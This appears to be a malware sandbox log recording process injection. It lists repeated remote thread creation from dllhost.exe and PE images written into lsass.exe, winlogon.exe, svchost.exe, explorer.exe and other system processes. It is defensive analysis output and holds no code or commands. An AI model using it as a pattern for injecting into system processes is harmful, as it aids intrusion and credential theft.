Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1302570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B82570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1112570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F92570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1142570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 192570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 152570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 832570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1252570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F42570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 172570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 942570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1062570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 182570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A02570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 442D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B1C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F9952E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D662E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 91452E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C3DC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C4F2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB272E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9FF42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B8522E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF1A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 67D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B392E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBFD2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59042E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A9E72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 73162E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E862E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 473C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F9D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3F72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60D82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A1602E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DAC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7F232E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7AF92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 80852E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A3142E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E53C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1BCE2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1052570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1032570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1082570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1222570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 702570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1302570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B82570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1112570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F92570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1142570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 192570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 152570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 832570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1252570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F42570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 172570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 942570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1062570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 182570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A02570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 442D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B1C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F9952E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D662E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 91452E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C3DC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C4F2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB272E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9FF42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B8522E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB2F3E68
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3EC2E64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E97F230000 value starts with: 4D5A
